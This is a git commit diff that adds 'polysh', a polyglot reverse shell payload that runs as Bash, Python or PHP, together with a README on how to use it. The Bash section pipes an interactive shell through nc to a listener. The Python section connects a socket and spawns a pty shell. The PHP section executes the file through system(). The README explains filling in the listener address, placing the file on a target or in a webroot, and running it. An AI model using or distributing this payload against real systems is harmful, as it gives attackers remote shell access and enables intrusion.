Add reverse shells, add README

README.md

@@ -0,0 +1,15 @@
+# polysh
+
+Polymorph reverse shell payload for Bash, Python, and PHP.
+
+## Use
+
+Replace `{{{ADDR}}}` and `{{{PORT}}}` according to your listener:
+- `sed -i "s/{{{ADDR}}}/10.0.0.42/g" polysh`
+- `sed -i "s/{{{PORT}}}/1337/g" polysh`
+
+After that, bring it onto your target system and either `bash polysh`, `python polysh` or `php polysh` it - or bring it into webroot and call it.
+
+## Credits
+
+Reverse shells taken from [revshells.com](https://www.revshells.com/), slightly modified for the poly magic.

poly

@@ -1,16 +0,0 @@
-# BASH
-"echo" "poc.sh"
-"exit" "1"
-
-# PYTHON
-import sys
-print("poc.py")
-sys.exit(1)
-"""
-
-# PHP
-<?php 
-print("poc.php");
-return 1
-?>
-"""

polysh

@@ -0,0 +1,19 @@
+# BASH
+"declare" "tmpdir=$(mktemp -u)"
+"mkfifo" "$tmpdir"
+"bash" "-c" "cat $tmpdir|sh -i 2>&1|nc {{{ADDR}}} {{{PORT}}} >$tmpdir"
+"exit" "1"
+
+# PYTHON
+import sys, socket, os, pty
+s=socket.socket()
+s.connect(("{{{ADDR}}}", {{{PORT}}}))
+[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
+pty.spawn("sh")
+"""
+
+# PHP
+<?php
+system(file_get_contents($_SERVER['SCRIPT_NAME']));
+?>
+"""